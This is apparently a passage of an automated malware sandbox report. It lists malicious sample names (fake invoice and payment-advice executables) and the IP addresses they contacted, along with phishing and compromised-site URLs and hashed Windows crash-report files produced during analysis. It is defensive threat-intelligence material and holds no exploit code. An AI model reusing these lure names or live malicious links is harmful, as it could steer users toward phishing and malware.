                                                    PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                    • 172.67.160.246
                                                    Yao Han Industries 61007-51333893QR001U,pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMYhSHH16k9JyrJp5w.exeGet hashmaliciousBrowse
                                                    • 14.102.148.13
                                                    J20KD8zhh6Daj1S.exeGet hashmaliciousBrowse
                                                    • 14.102.148.13
                                                    SecuriteInfo.com.Gen.NN.ZemsilCO.34804.so0@a88aQDc.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    https://www.canva.com/design/DAEJ8WkMgI4/_KLUOn175CqxOwu-gNDpeQ/view?utm_content=DAEJ8WkMgI4&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                    • 103.21.183.202
                                                    http://orchardwellness.com/@gebm.com/Drive/dgk8g6jmx3cglwh10pfby2e4.php?HK10LC1602020639f9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32c&email=&error=Get hashmaliciousBrowse
                                                    • 103.21.183.202
                                                    OpxX14nKsz.xlsGet hashmaliciousBrowse
                                                    • 103.21.180.162
                                                    280122622-310820.docGet hashmaliciousBrowse
                                                    • 212.8.231.101
                                                    DEBIT NOTE USD 5.412.exeGet hashmaliciousBrowse
                                                    • 210.5.47.198
                                                    SecuriteInfo.com.Variant.MSILPerseus.227807.2953.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    430#U0437.jsGet hashmaliciousBrowse
                                                    • 183.81.162.20
                                                    430#U0437.jsGet hashmaliciousBrowse
                                                    • 183.81.162.20
                                                    http://www.ukmsc-gammaknife.com/wp-includes/ID3/bd4a7db75b1640babb7197913dcb6955/97913dcb6955/Get hashmaliciousBrowse
                                                    • 103.21.182.63
                                                    http://weddingstudio.com.my/Amazon/En/Orders-details/012019Get hashmaliciousBrowse
                                                    • 14.102.148.45

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_A4-058000200390-_22b30012e2a9340b0356f203be6ce5a2ae6da_1d3dc762_18d9dc37\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16300
                                                    Entropy (8bit):3.7739596920682645
                                                    Encrypted:false
                                                    SSDEEP:192:GsimHBUZMXSaKsUAeZiN/u7sKS274ItAe:DjBUZMXSalmW/u7sKX4ItAe
                                                    MD5:BFC6839F910B613933C59C1C408AB511
                                                    SHA1:3A752F2786D7A4C4B1BF2677894502125A6C3FF4
                                                    SHA-256:E056EF80AEC8B461C658F26BEB6A29D854E53CD1BD7A9E263B7BE7855A9B2DCD
                                                    SHA-512:C1192932BA235A243B3CC95484BFB5FDFCB6AA605B2770EE77B615AAC7C280D521258803D0D3127E7B88B4B00AE0A7F7AD773FA94711CD486380F699C36D62D7
                                                    Malicious:false
                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.3.6.2.1.3.9.6.0.7.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.3.6.2.9.7.8.6.6.6.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.7.8.5.0.f.8.-.c.4.b.2.-.4.7.7.9.-.9.2.e.9.-.d.6.c.0.1.c.1.b.3.7.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.a.9.5.8.3.3.-.1.6.d.a.-.4.5.b.f.-.9.d.9.5.-.e.1.8.1.2.0.4.e.0.f.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.4.-.0.5.8.0.0.0.2.0.0.3.9.0.-.1.0.-.1.4._.R.E.V._.p.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.0.-.0.0.0.1.-.0.0.1.b.-.8.b.e.8.-.a.6.6.b.c.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.1.c.a.0.5.b.f.3.9.9.8.9.2.6.d.7.f.e.3.7.a.9.8.e.9.c.0.8.1.2.9.0.0.0.0.0.9.0.4.!.0.0.0.0.b.5.2.d.9.b.a.9.b.7.8.9.0.e.2.b.5.1.e.6.4.a.b.8.8.9.8.0.5.c.f.c.e.5.1.2.6.e.b.b.!.A.4.-.0.
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_2b4ac1a517da4509e55ae841ecc74477b428236_b4418cc1_06f2fc1e\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15900
                                                    Entropy (8bit):3.7649375025832814
                                                    Encrypted:false
                                                    SSDEEP:192:uOqHtvimHBUZMXCaPceny+f//u7sQS274ItqyJ:+rBUZMXCaZ1X/u7sQX4ItHJ
                                                    MD5:E421DD977C9ACCD76C60ECB8AE32A548
                                                    SHA1:E3B3C3998B92175B4763727A9513CEFE834F0BF0
                                                    SHA-256:CEC02A18EDFD7B055CE595791181671353807F5E29DA76F5D0AFD79D8E57374C
                                                    SHA-512:AC42799DDFA745990EE3517B5CFF365B884252AC40CEC095694C98C0A895AA99A517CFE0B46EF7B3362C676ADF854B7A1543C4CE2A886D3CF3923D36EB56D013
                                                    Malicious:false
                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.3.6.8.5.9.4.2.7.2.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.3.7.0.5.4.4.2.6.7.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.c.0.1.d.2.f.-.4.c.5.3.-.4.8.2.7.-.a.b.c.f.-.8.6.3.0.b.1.0.e.8.4.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.9.a.f.c.0.d.-.2.8.d.6.-.4.d.e.f.-.9.6.d.9.-.6.4.b.0.6.c.7.8.f.6.3.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.c.0.-.0.0.0.1.-.0.0.1.b.-.5.8.5.f.-.6.a.8.b.c.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.e.0.3.c.b.3.0.e.b.2.1.8.b.9.a.5.4.7.2.a.9.2.d.5.6.5.3.4.5.5.0.0.0.0.0.9.0.4.!.0.0.0.0.b.5.2.d.9.b.a.9.b.7.8.9.0.e.2.b.5.1.e.6.4.a.b.8.8.9.8.0.5.c.f.c.e.5.1.2.6.e.b.b.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_2b4ac1a517da4509e55ae841ecc74477b428236_b4418cc1_10572409\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16034
                                                    Entropy (8bit):3.764375690354279
                                                    Encrypted:false
                                                    SSDEEP:192:XL0YuimHBUZMXCaKsUAeZiN/u7sQS274ItqyP:7LCBUZMXCalmW/u7sQX4ItHP
                                                    MD5:F1769CA11F15309841F7E4376B3D580C
                                                    SHA1:87103B768A82086FE79CC5BCFC8D23C32264C657
                                                    SHA-256:AD7B69EC995F5DA2E4EC465AEC239090C7EA678B5EDD017DDC2C29337E4D2D34
                                                    SHA-512:CE593B4F1D729A46BFE4370CFC22BF5115BCF5C53CB11487C07FA8E4FF98067536BBA6B4572A7E3D9DFE0FD7DCEE38A862E22ADB35B0BC81BAD0D6D037799D8B
                                                    Malicious:false
                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.3.6.7.4.0.5.2.1.4.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.3.6.9.4.5.0.5.2.3.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.f.2.0.8.8.3.-.e.5.4.3.-.4.9.4.1.-.b.e.8.6.-.f.b.5.0.1.5.d.4.a.a.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.f.b.1.8.3.8.-.a.4.e.c.-.4.c.b.8.-.a.c.1.1.-.1.5.a.e.4.4.c.3.d.4.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.2.c.-.0.0.0.1.-.0.0.1.b.-.f.d.0.6.-.7.5.8.6.c.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.e.0.3.c.b.3.0.e.b.2.1.8.b.9.a.5.4.7.2.a.9.2.d.5.6.5.3.4.5.5.0.0.0.0.0.9.0.4.!.0.0.0.0.b.5.2.d.9.b.a.9.b.7.8.9.0.e.2.b.5.1.e.6.4.a.b.8.8.9.8.0.5.c.f.c.e.5.1.2.6.e.b.b.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B46.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 08:47:58 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):302765
                                                    Entropy (8bit):3.7501461495282693
                                                    Encrypted:false
                                                    SSDEEP:3072:KXyGRBu0+jd+p8CdB2o+L9gIOgF5mvFLw0iUCgU+9hyzSXrZoS2n2:6RM07pMBL9RpD/JTjkZoI
                                                    MD5:A000F0418C09C6DFE2FA8CF3E45806AE
                                                    SHA1:173CFFD2421C0902FD15813E97FD1A559314430A
                                                    SHA-256:4BA5851D7F7F834D196899BA2A2405C8C0275430D64232403A7235F8710DF294
                                                    SHA-512:7C5B259F338A8E6C55885DAE7F1E53B73421C6C8475E4D6D2B9BB79FD952F3A72794795EED59C4E14ADF6E1B4BD152B91D7A6CAA185E111655BE8A85BFC2442C
                                                    Malicious:false
                                                    Preview: MDMP....... .......>.4`...................U...........B...... ,......GenuineIntelW...........T.......,...$.4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER94AB.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8392
                                                    Entropy (8bit):3.6919325540904246
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNi1A686YrUSUJF/3kgmfZ/SL+prf89bdEsf34/m:RrlsNiC686YoSUJFPkgmfxSfd3f3d
                                                    MD5:69D24C0DE770F1FBB89CF14B4CAD61FF
                                                    SHA1:386E6660CEED0015ADB616857717E69F349EF88C
                                                    SHA-256:C79E1F4339A7688879EC2C74C2DE5ABF36510C0AF0D63559F260D4399FEC13A7
                                                    SHA-512:A3632935FD493BAC148B09AE88EFFC7381C14490309F36724CA244D46AECE3CB9A584D01C561114735DDCEAB01228F5C6C7FBFF4E008D0D578F655556D7F9A07
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.9.2.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D76.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4668
                                                    Entropy (8bit):4.45014383346403
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsIJgtWI9kCWSC8BtrM8fm8M4JVFF1+q8v4ikuTnLk1d:uITfObDSNTxJ/KRkuTLk1d
                                                    MD5:1B069735485FAE6626BDB82BE56ECE84
                                                    SHA1:08C0D850CB9E91C6511A857B54DCA94B2E6A44A4
                                                    SHA-256:059DFE19594F15D04DFB9335C5528B675C7290D5A9404EB76798FDE4085821CF
                                                    SHA-512:FCA541047B5EA5F856FADE8FDE7C37D2A3E1D1079B65E7C6CAD44B2F98A5051ABF4F5A9FC760880064742E31A5539404D27E96ECC2BE1D327778A4FA9C7C5B83
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9B8.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:48:14 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):193940
                                                    Entropy (8bit):4.448803965702104
                                                    Encrypted:false
                                                    SSDEEP:3072:djiqj0AQJjd+pAzVaoSw9gIOgF5k0fUCgU7+5yj99zeC5:djic0v+pV/w9RpDk8Tji5mzp
                                                    MD5:E37220F5970C6AFAF37DDA42C9D32F79
                                                    SHA1:B3AFC7A3E37520DE2E5AA950631733216D7889C9
                                                    SHA-256:D6F1C84EF77F6E74B8942ED601F08ACECE24628CB9A33C4945B365AB73319BEC
                                                    SHA-512:66E0B129DD2F411AE30BBDC18FE5D57C19C7FBAFF82245E75F5706D7328E8F345FB589F519ABF0AE5825B44F60551AD96F9AD15028E9DB258EBCA3A66D3FB47C
                                                    Malicious:false
                                                    Preview: MDMP....... .......N.4`...................U...........B......D)......GenuineIntelW...........T...........,.4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD95.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 08:47:05 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):302765
                                                    Entropy (8bit):3.7370014275285786
                                                    Encrypted:false
                                                    SSDEEP:3072:08NFHoh0mS22jd+pYZbgdb9gIOgF5+x0QUCgUHtIaxFkoXh5zz:Rw0d2jpl9RpDCnTjVksP
                                                    MD5:EB89E5B3A234F9D666675CB4AECC16B4
                                                    SHA1:78EBFD8D672BB0036ADB41FDA3B2BE02898842FF
                                                    SHA-256:D2490217E8D12838ED35333A463C50E88AD204414D5E683702B985B2484024AA
                                                    SHA-512:4B3AF4757FE7FCA9E9BC65821D85B64AB489384206A3C7D8FD966149E7CD470BCF20B9DB0EEDCA1FFBCFB735BB5144ECCE614152466D4F9BFB7EF325346AAE54
                                                    Malicious:false
                                                    Preview: MDMP....... .........4`...................U...........B...... ,......GenuineIntelW...........T.............4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC218.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8472
                                                    Entropy (8bit):3.699376109781331
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiYp62h6YrzSUtjLgmfZ0SL+prz89btVsfxPm:RrlsNiO646YPSUtPgmfWSLtufE
                                                    MD5:D92949B08F55869B3317AB94B544C183
                                                    SHA1:3B03ED0D7E54A111D823C5834250C5B40F1C36C7
                                                    SHA-256:98F5474FE1DDCA8BE13E38FD95106E4BFD95024947D23901F1FF8F7DE8E68D17
                                                    SHA-512:64026B7D192950D2CBE9658BB0FAF6814F77278DD22EC158C71CBCF52EF89AB34FD119CA4D8104416ADE6A7F2EA416E9B6CB7D8F68FF743D1B5FB9D2FF8A6319
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.0.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4C9.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4775
                                                    Entropy (8bit):4.506028890634219
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsVJgtWI9kCWSC8BtCS8fm8M4JlJTFFa+q8vrT6NpkuTCbLHbOdd:uITfvbDSNEJlJ+KrenkuubLHbCd
                                                    MD5:14D89A4A3620137B9570FE2102ECC093
                                                    SHA1:A18E9CA9454AD6C9FEC3C783F3CD0392E98BB96E
                                                    SHA-256:61A04ADCC9BE1678AC749298DB86EDD21A072E5EE80E812D76D1D57B687A9798
                                                    SHA-512:785FC0EE3FC0956D469D533D7F096B577C0C751E665F13CA10217E0B0289517CA43A9BC24CED504F669DC0BB3586361DE07B6D74D2BE4E47C8F74A15181868AC
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873717" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0F8.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8390
                                                    Entropy (8bit):3.693070169571263
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiIJ6z/6Yr4SUgoigmfZ/SL+prZ89bTIsfFRm:RrlsNi+6r6YESUgoigmfxSZT7fa
                                                    MD5:003FE21C083309777FEE70C441DE512E
                                                    SHA1:481527269D291C16D572DEBB12DA8A806B1CB6D5
                                                    SHA-256:1105C2A4B7A2AC515D456C90FB2FEA56F51D745BAE44C3016056473F0CB212DE
                                                    SHA-512:D221B22BB58C939089B41B804040F4EFFAC73EF467BE74ECCB1CA7CB15A97D761295D2574C40919D236CB705B6B32ACE63CCB930B689E80C03C68FCD5EC33F79
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.1.6.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD510.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4668
                                                    Entropy (8bit):4.451093760155469
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsIJgtWI9kCWSC8Btj58fm8M4JVFFv+q8v4xkuTnLkEd:uITfObDSNr+JtKikuTLkEd
                                                    MD5:7B70D12BC87F48C2F4A7BF6AC2385298
                                                    SHA1:87E126B5D2A5DD8959F3B5EA8AF072D86A0604C3
                                                    SHA-256:D99021C388E63AB7F95DAC191F48ED36D0D31C681E926EEDB79E5D3093B33AEF
                                                    SHA-512:137880ED9E01DA92C0C5AEF38B53D8D78798F55ED96CA4D652864CB4B18D8AAF05327777B3EC6E1E8E1392B06F7C9D0B401533F4F19A0C582787F61D4DF6C2F1
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
